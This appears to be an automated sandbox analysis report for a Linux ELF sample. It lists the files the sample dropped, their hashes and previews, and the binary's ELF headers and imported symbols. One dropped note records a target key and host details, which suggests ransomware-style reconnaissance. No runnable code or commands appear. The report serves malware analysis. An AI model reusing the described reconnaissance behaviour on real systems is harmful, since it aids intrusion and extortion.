                                SHA-512:5B83AA600C93A74C9BEFB83B7E23A1E8CF77D74417E173FD142C78BC88C69FB3CDB56B3C8E6E75869AC0D73CF1A8771FEE38758E5BCFBF51BBE9846F5162E4EA
                                Malicious:false
                                Preview:..!2A........(.............................p./....r..{`(.-.X"..}....[.i..z.m....I.8.&. .!oX.....w. ..WRD...&..}{..?.X.#..6..../Q.D3$.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):141
                                Entropy (8bit):5.784304113914251
                                Encrypted:false
                                SSDEEP:3:rIU+knll3ll/lslolt4oWmROCUDQTJLiP06hr+T23fKqkzlazrT31zAn:cUD64WLmM7P06hr6qkcj31E
                                MD5:CB3096B8012710E2B53F83AD6DA38E73
                                SHA1:C13D8D5487C74574AAEE8C2DDF71A1ABC40C44DF
                                SHA-256:5BE47DAC8F8CF85B705F5BEC6132119BE4E381157C50D1BF9D492D8CE46D2E58
                                SHA-512:7BA45E1B5EFDEAB029BDDE456E821B90155EF9966C05D988CC9BD7E1BF7A9F7DD0F9C3BA578DFFB39A9292DA61A5AC247739F6E5E2724295A1B2BDA383D85B12
                                Malicious:false
                                Preview:.,.m..!2A........(...........................k..jq.so.....1.....d.....G..W.........U..v..hP..>..B..5S...WRD...&..}{..?.X.#..6..../Q.D3$.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):1288
                                Entropy (8bit):7.784348124852347
                                Encrypted:false
                                SSDEEP:24:XT7NdC8pC+VEUlCcxO9cu4UZp4u/6Lnxd15c5DxCqBVcZjfXjR2iWO:VY8pCe1CX2dUTlidd1C5DxCqBAF1WO
                                MD5:832EFDDCB78113EBDFDBEDE5C488EC0E
                                SHA1:FC548C2C5789761B2D4D81C48DA48C15C138C882
                                SHA-256:2CCF81BD2DA2218B8BB86D5E733F676E2A54D0306110B9F7768733DC4CB97AA0
                                SHA-512:70E2EF8EEAC9D8F06B43EA9F61116C4FA607889702681F68EA070AE1A7D19C88BE3061E56CFE747B8D421D6C51273F179C2B8753B1FF4F785CE9632E0EDE4B3D
                                Malicious:false
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):2.0
                                Encrypted:false
                                SSDEEP:3:ukn:ukn
                                MD5:0AFB21A5F243EC6C489CE1033BD2C71D
                                SHA1:62EA23F71D0D21FB2EF63D9DE4B871F5B113D051
                                SHA-256:5E873C29AC18E151673593F7E7E1A5F72E952EA870B1AA3037740D722C963937
                                SHA-512:9C883309AADCDF36BE075438DC76BBFB0C2D33BD2466D11A34A6CAD0B9EB7542BAAC6EF46BF9431B9588FACBEA024928F3FCDA2ACEF098FBF62C26C153F04F1B
                                Malicious:false
                                Preview:.!2A
                                Process:/usr/bin/xkbcomp
                                File Type:Compiled XKB Keymap: lsb, version 15
                                Category:dropped
                                Size (bytes):12040
                                Entropy (8bit):4.844996337994878
                                Encrypted:false
                                SSDEEP:192:QDyb2zOmnECQmwTVFfLaSLusdfVcqLkjoqdD//PJeCQ1+JdDx0s2T:QDyAxvYhFf+S62fzmp7/dMJ
                                MD5:AC37A4B84E9FB5FE9E63CE9367F31371
                                SHA1:E2D70CE4A01CB5F80F0C8B63EE856AE6FE8B0EFA
                                SHA-256:143E089EE7EB5E9BF088C19FC59A0EA7ED061AD3AE3E3CB5BC63BDFD86833DFF
                                SHA-512:3F683C4D4A3EEA88646E2BDB51BB79678B083944307811060AD0116773045F2D0245598E084310F8AC3934295E228D08B567FA6AA15FC3C9410B973AB4025664
                                Malicious:false
                                Preview:.mkx..............D.......................h.......<.....P.,%......|&......D.......NumLock.....Alt.....LevelThree..LAlt....RAlt....RControl....LControl....ScrollLock..LevelFive...AltGr...Meta....Super...Hyper...........evdev+aliases(qwerty)...!.....ESC.AE01AE02AE03AE04AE05AE06AE07AE08AE09AE10AE11AE12BKSPTAB.AD01AD02AD03AD04AD05AD06AD07AD08AD09AD10AD11AD12RTRNLCTLAC01AC02AC03AC04AC05AC06AC07AC08AC09AC10AC11TLDELFSHBKSLAB01AB02AB03AB04AB05AB06AB07AB08AB09AB10RTSHKPMULALTSPCECAPSFK01FK02FK03FK04FK05FK06FK07FK08FK09FK10NMLKSCLKKP7.KP8.KP9.KPSUKP4.KP5.KP6.KPADKP1.KP2.KP3.KP0.KPDLLVL3....LSGTFK11FK12AB11KATAHIRAHENKHKTGMUHEJPCMKPENRCTLKPDVPRSCRALTLNFDHOMEUP..PGUPLEFTRGHTEND.DOWNPGDNINS.DELEI120MUTEVOL-VOL+POWRKPEQI126PAUSI128I129HNGLHJCVAE13LWINRWINCOMPSTOPAGAIPROPUNDOFRNTCOPYOPENPASTFINDCUT.HELPI147I148I149I150I151I152I153I154I155I156I157I158I159I160I161I162I163I164I165I166I167I168I169I170I171I172I173I174I175I176I177I178I179I180I181I182I183I184I185I186I187I188I189I190FK13FK14FK15FK16FK17FK18
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):461
                                Entropy (8bit):5.44398768343762
                                Encrypted:false
                                SSDEEP:12:aWvhNmEwFBD4oNTFNW6YzvNrz08sksFA7lvsG4d:aWpNrCp4oNjXGF068Glvb4d
                                MD5:E39886ABF6C91DD6E4B21F113CD380AB
                                SHA1:641E46F999A86E68781FBB486FFA69E98E38350E
                                SHA-256:ED335A87DF6AB26D1D4B69095295F3BF57DADD67E15340BBA565BE071A0FA176
                                SHA-512:BF89D97F3764DEFF54001224525D2C3C6BB24F06D99000BFAEE892CCC9B17D9A5D3E9E6732B92E4DD6B410B47CB5392632539009C1A770993DE96F52CCF5848C
                                Malicious:false
                                Preview:hash: EA4EC50098D5E3A5284363606137C38100C9D4D907FB82C1C84A806588D1C977.key_of_target: C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.external_IP: 173.254.250.69.internal_IP: 173.254.250.69.hostname: galassia.username: saturnino.os: Ubuntu 20.04.2 LTS (Focal Fossa).locale: en_US.UTF-8.arch: x86_64.CPU_model_RAM_size: Intel(R) Xeon(R) Silver 4210 CPU @ 2.20GHz/3064296 kb.common_database_volume: 0.common_backups_volume: 0.common_vm_volume: 0.
                                Process:/usr/lib/accountsservice/accounts-daemon
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):61
                                Entropy (8bit):4.66214589518167
                                Encrypted:false
                                SSDEEP:3:urzMQvNT+PzKLrAan4R8AKn:gzMQIzKLrAa4M
                                MD5:542BA3FB41206AE43928AF1C5E61FEBC
                                SHA1:F56F574DAF50D609526B36B5B54FDD59EA4D6A26
                                SHA-256:730D9509D4EAA7266829A8F5A8CFEBA6BBDDD5873FC2BD580AD464F4A237E11A
                                SHA-512:D774B8F191A5C65228D1B3CA1181701CFCD07A3D91C5571B0DDF32AD3E241C2D7BDFC0697AB97DC10441EF9CDC8AEE5B19BC34E13E5C8B0B91AD06EEF42F5AEA
                                Malicious:false
                                Preview:[User].XSession=.Icon=/var/lib/gdm3/.face.SystemAccount=true.
                                Process:/usr/lib/gdm3/gdm-x-session
                                File Type:X11 Xauthority data
                                Category:dropped
                                Size (bytes):104
                                Entropy (8bit):4.983294787198872
                                Encrypted:false
                                SSDEEP:3:rg/WFllasO93bkz5tNWFllasO93bkz5n:rg/WFl2LkvNWFl2LkV
                                MD5:7CD4A005163E3209906D68E2E51B52AE
                                SHA1:F1FC0DEE3C369D813ED3BD99FBAAEA9C926F4590
                                SHA-256:6105BA2B4E3CDE9F010A552BED0F6631FE0ED13113EAD59E7B453C4086706F73
                                SHA-512:F7721151EF4C9DBC5CF6A0EE2962F3C90F5DDA07EA4A324D5FD45656FE405B4176C482E0BC5F148911EABC96536175F944A07B5A0D8E4FBC76B4C3854286BFE4
                                Malicious:false
                                Preview:....galassia....MIT-MAGIC-COOKIE-1......,..^c.+...UJ....galassia....MIT-MAGIC-COOKIE-1......,..^c.+...UJ
                                Process:/usr/lib/xorg/Xorg
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):41599
                                Entropy (8bit):5.287086538349041
                                Encrypted:false
                                SSDEEP:384:ha4xtRMCTJMKdQdadOdkdAdqd7dXded+dQdXdLdNdPdjdgdmdNd6dSMdPidNqdH+:M4xsUyxgBu6XdrlOkv0lyM
                                MD5:2FC8B0CFD57998A341AAA243E66D5DA9
                                SHA1:36BF848E96CD1003AB4E998B10A80DB7E10C58E0
                                SHA-256:6D5B00A0CFB5E73F33250F349598BE8E8CED595D1562E909C01F4FD0E6D96236
                                SHA-512:E04239CDE2F5064D2B128752CD459603219593B6798353E3DF928B4205BB75FCCA9726D1D4343D02A41F3CC3230E1AD876CF67158AE450525BC3CDB40A581DC9
                                Malicious:false
                                Preview:[ 427.941] (--) Log file renamed from "/var/log/Xorg.pid-6374.log" to "/var/log/Xorg.0.log".[ 427.969] .X.Org X Server 1.20.11.X Protocol Version 11, Revision 0.[ 427.985] Build Operating System: linux Ubuntu.[ 427.995] Current Operating System: Linux galassia 5.4.0-72-generic #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021 x86_64.[ 428.006] Kernel command line: Patched by Joe: BOOT_IMAGE=/vmlinuz-5.4.0-72-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro maybe-ubiquity.[ 428.038] Build Date: 06 July 2021 10:17:51AM.[ 428.050] xorg-server 2:1.20.11-1ubuntu1~20.04.2 (For technical support please see http://www.ubuntu.com/support) .[ 428.060] Current version of pixman: 0.38.4.[ 428.069] .Before reporting problems, check http://wiki.x.org..to make sure that you have the latest version..[ 428.078] Markers: (--) probed, (**) from config file, (==) default setting,..(++) from command line, (!!) notice, (II) informational,..(WW) warning, (EE) error, (NI) not implemented, (??)
                                File type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, stripped
                                Entropy (8bit):6.2660463138040265
                                TrID:
                                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                File name:Zc9eO57fgF.elf
                                File size:1'802'024 bytes
                                MD5:503c35c37d00d04ff2793c2b4bf5038f
                                SHA1:a03a9d06ca8441cb2ec7fe0c49cb56023130d884
                                SHA256:20e0e61d27762a524f6974fb9f4995062582db351d5576e62a214d6b5e5808e7
                                SHA512:c653fd4f8a6724b9a25e24e9a2a0152340be294d4d53d82e5762fd8599b014dabc4be6a2830822d51ce744ef256f1e5fe78b5c016fc24907de7ea964fb5835ee
                                SSDEEP:24576:94GdIhU6rF5IF0pGVZa4B6dmyw5DQ7EQ6LPni2Mt+aa:XShUL7VZ1BYZw5DcRt+a
                                TLSH:B8856A4AF7A768BEC193C430875BC5B3ED21B86552217D3B65C1EA302E62E204B6DF71
                                File Content Preview:.ELF..............>.......@.....@........x..........@.8...@.............@.......@.@.....@.@.....h.......h.................................@.......@...............................................@.......@......3.......3.......................@.......@@....

                                ELF header

                                Class:ELF64
                                Data:2's complement, little endian
                                Version:1 (current)
                                Machine:Advanced Micro Devices X86-64
                                Version Number:0x1
                                Type:EXEC (Executable file)
                                OS/ABI:UNIX - Linux
                                ABI Version:0
                                Entry Point Address:0x40aa18
                                Flags:0x0
                                ELF Header Size:64
                                Program Header Offset:64
                                Program Header Size:56
                                Number of Program Headers:11
                                Section Header Offset:1800360
                                Section Header Size:64
                                Number of Section Headers:26
                                Header String Table Index:25
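                                Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
                                 | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 |  | 0 | 0 | 0
                                .interp | PROGBITS | 0x4002e0 | 0x2e0 | 0x1c | 0x0 | 0x2 | A | 0 | 0 | 1
                                .note.ABI-tag | NOTE | 0x4002fc | 0x2fc | 0x20 | 0x0 | 0x2 | A | 0 | 0 | 4
                                .dynsym | DYNSYM | 0x400848 | 0x848 | 0x1128 | 0x18 | 0x2 | A | 4 | 1 | 8
                                .dynstr | STRTAB | 0x401970 | 0x1970 | 0x70f | 0x0 | 0x2 | A | 0 | 0 | 1
                                .gnu.version_r | VERNEED | 0x4021f0 | 0x21f0 | 0xc0 | 0x0 | 0x2 | A | 4 | 5 | 8
                                .rela.dyn | RELA | 0x4022b0 | 0x22b0 | 0x90 | 0x18 | 0x2 | A | 3 | 0 | 8
                                .rela.plt | RELA | 0x402340 | 0x2340 | 0x10b0 | 0x18 | 0x42 | AI | 3 | 22 | 8
                                .init | PROGBITS | 0x404000 | 0x4000 | 0xe | 0x0 | 0x6 | AX | 0 | 0 | 4
                                .plt | PROGBITS | 0x404010 | 0x4010 | 0xb30 | 0x10 | 0x6 | AX | 0 | 0 | 16
                                .text | PROGBITS | 0x404b40 | 0x4b40 | 0x14a44c | 0x0 | 0x6 | AX | 0 | 0 | 16
                                .fini | PROGBITS | 0x54ef8c | 0x14ef8c | 0x9 | 0x0 | 0x6 | AX | 0 | 0 | 4
                                .rodata | PROGBITS | 0x54f000 | 0x14f000 | 0x172d4 | 0x0 | 0x2 | A | 0 | 0 | 64
                                .eh_frame_hdr | PROGBITS | 0x5662d4 | 0x1662d4 | 0xa3e4 | 0x0 | 0x2 | A | 0 | 0 | 4
                                .eh_frame | PROGBITS | 0x5706b8 | 0x1706b8 | 0x373a8 | 0x0 | 0x2 | A | 0 | 0 | 8
                                .gcc_except_table | PROGBITS | 0x5a7a60 | 0x1a7a60 | 0x72e9 | 0x0 | 0x2 | A | 0 | 0 | 4
                                .tbss | NOBITS | 0x5afda8 | 0x1aeda8 | 0x10 | 0x0 | 0x403 | WAT | 0 | 0 | 8
                                .init_array | INIT_ARRAY | 0x5afda8 | 0x1aeda8 | 0x50 | 0x8 | 0x3 | WA | 0 | 0 | 8
                                .fini_array | FINI_ARRAY | 0x5afdf8 | 0x1aedf8 | 0x8 | 0x8 | 0x3 | WA | 0 | 0 | 8
                                .data.rel.ro | PROGBITS | 0x5afe00 | 0x1aee00 | 0x7a20 | 0x0 | 0x3 | WA | 0 | 0 | 32
                                .dynamic | DYNAMIC | 0x5b7820 | 0x1b6820 | 0x220 | 0x10 | 0x3 | WA | 4 | 0 | 8
                                .got | PROGBITS | 0x5b7a40 | 0x1b6a40 | 0x5b8 | 0x8 | 0x3 | WA | 0 | 0 | 8
                                .got.plt | PROGBITS | 0x5b8000 | 0x1b7000 | 0x5a8 | 0x8 | 0x3 | WA | 0 | 0 | 8
                                .data | PROGBITS | 0x5b85c0 | 0x1b75c0 | 0x200 | 0x0 | 0x3 | WA | 0 | 0 | 32
                                .bss | NOBITS | 0x5b87c0 | 0x1b77c0 | 0xbd60 | 0x0 | 0x3 | WA | 0 | 0 | 32
                                .shstrtab | STRTAB | 0x0 | 0x1b77c0 | 0xe5 | 0x0 | 0x0 |  | 0 | 0 | 1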
                                Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
                                PHDR | 0x40 | 0x400040 | 0x400040 | 0x268 | 0x268 | 1.9967 | 0x4 | R | 0x8 |  | 
                                INTERP | 0x2e0 | 0x4002e0 | 0x4002e0 | 0x1c | 0x1c | 3.9408 | 0x4 | R | 0x1 | /lib64/ld-linux-x86-64.so.2 | .interp
                                LOAD | 0x0 | 0x400000 | 0x400000 | 0x33f0 | 0x33f0 | 2.3866 | 0x4 | R | 0x1000 |  | .interp .note.ABI-tag .dynsym .dynstr .gnu.version_r .rela.dyn .rela.plt
                                LOAD | 0x4000 | 0x404000 | 0x404000 | 0x14af95 | 0x14af95 | 6.2521 | 0x5 | R E | 0x1000 |  | .init .plt .text .fini
                                LOAD | 0x14f000 | 0x54f000 | 0x54f000 | 0x5fd49 | 0x5fd49 | 5.8649 | 0x4 | R | 0x1000 |  | .rodata .eh_frame_hdr .eh_frame .gcc_except_table
                                LOAD | 0x1aeda8 | 0x5afda8 | 0x5afda8 | 0x8a18 | 0x14778 | 2.9625 | 0x6 | RW | 0x1000 |  | .tbss .init_array .fini_array .data.rel.ro .dynamic .got .got.plt .data .bss
                                DYNAMIC | 0x1b6820 | 0x5b7820 | 0x5b7820 | 0x220 | 0x220 | 1.6222 | 0x6 | RW | 0x8 |  | .dynamic
                                NOTE | 0x2fc | 0x4002fc | 0x4002fc | 0x20 | 0x20 | 1.7487 | 0x4 | R | 0x4 |  | .note.ABI-tag
                                TLS | 0x1aeda8 | 0x5afda8 | 0x5afda8 | 0x0 | 0x10 | 0.0000 | 0x4 | R | 0x8 |  | .tbss
                                GNU_EH_FRAME | 0x1662d4 | 0x5662d4 | 0x5662d4 | 0xa3e4 | 0xa3e4 | 6.2311 | 0x4 | R | 0x4 |  | .eh_frame_hdr
                                GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x8 |  | 
                                Type | Meta | Value | Tag
                                DT_NEEDED | sharedlib | librt.so.1 | 0x1
                                DT_NEEDED | sharedlib | libpthread.so.0 | 0x1
                                DT_NEEDED | sharedlib | libm.so.6 | 0x1
                                DT_NEEDED | sharedlib | libc.so.6 | 0x1
                                DT_NEEDED | sharedlib | ld-linux-x86-64.so.2 | 0x1
                                DT_INIT | value | 0x404000 | 0xc
                                DT_FINI | value | 0x54ef8c | 0xd
                                DT_INIT_ARRAY | value | 0x5afda8 | 0x19
                                DT_INIT_ARRAYSZ | bytes | 80 | 0x1b
                                DT_FINI_ARRAY | value | 0x5afdf8 | 0x1a
                                DT_FINI_ARRAYSZ | bytes | 8 | 0x1c
                                DT_HASH | value | 0x400320 | 0x4
                                DT_GNU_HASH | value | 0x400810 | 0x6ffffef5
                                DT_STRTAB | value | 0x401970 | 0x5
                                DT_SYMTAB | value | 0x400848 | 0x6
                                DT_STRSZ | bytes | 1807 | 0xa
                                DT_SYMENT | bytes | 24 | 0xb
                                DT_DEBUG | value | 0x0 | 0x15
                                DT_PLTGOT | value | 0x5b8000 | 0x3
                                DT_PLTRELSZ | bytes | 4272 | 0x2
                                DT_PLTREL | pltrel | DT_RELA | 0x14
                                DT_JMPREL | value | 0x402340 | 0x17
                                DT_RELA | value | 0x4022b0 | 0x7
                                DT_RELASZ | bytes | 144 | 0x8
                                DT_RELAENT | bytes | 24 | 0x9
                                DT_VERNEED | value | 0x4021f0 | 0x6ffffffe
                                DT_VERNEEDNUM | value | 5 | 0x6fffffff
                                DT_VERSYM | value | 0x402080 | 0x6ffffff0
                                DT_NULL | value | 0x0 | 0x0
                                Name | Version Info Name | Version Info File Name | Section Name | Value | Size | Symbol Type | Symbol Bind | Symbol Visibility | Ndx
                                 |  |  | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF
                                _ITM_RU1 |  |  | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF
                                _ITM_RU8 |  |  | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF
                                _ITM_addUserCommitAction |  |  | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF
                                _ITM_memcpyRnWt |  |  | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF
                                _ITM_memcpyRtWn |  |  | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF
                                _ZGTtdlPv |  |  | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF
                                _ZGTtnam |  |  | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF
                                __ctype_get_mb_cur_max |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __ctype_tolower_loc |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __cxa_atexit |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __duplocale |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __errno_location |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __freelocale |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __fxstat64 |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __gmon_start__ |  |  | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF
                                __iswctype_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __libc_start_main |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __newlocale |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __nl_langinfo_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __pthread_key_create |  |  | .dynsym | 0x404990 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __strcoll_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __strftime_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __strtod_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __strtof_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __strxfrm_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __tls_get_addr |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __towlower_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __towupper_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __uselocale |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __wcscoll_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __wcsftime_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __wcsxfrm_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __wctype_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __xstat |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                __xstat64 |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                abort |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                bind_textdomain_codeset |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                bindtextdomain |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                btowc |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                clock_gettime |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                close |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                closedir |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                connect |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                dgettext |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                dl_iterate_phdr |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                endmntent |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                exit |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fclose |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fcntl |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fdopen |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fflush |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fileno |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                flock |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fopen |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fopen64 |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fputc |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fputs |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fread |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                free |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                freeifaddrs |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fseek |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fseeko64 |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fsync |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                ftell |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                ftello64 |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                ftruncate64 |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                fwrite |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                get_nprocs |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                getc |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                getenv |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                gethostbyname |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                gethostname |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                getifaddrs |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                getlogin_r |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                getmntent |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                getnameinfo |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                getpid |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                getsockopt |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                getuid |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                getwc |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                gmtime_r |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                iconv |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                iconv_close |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                iconv_open |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                inet_pton |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                ioctl |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                isspace |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                iswspace |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                kill |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                log |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                lseek64 |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                malloc |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                mbrtowc |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                mbsnrtowcs |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                mbsrtowcs |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                memchr |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                memcmp |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
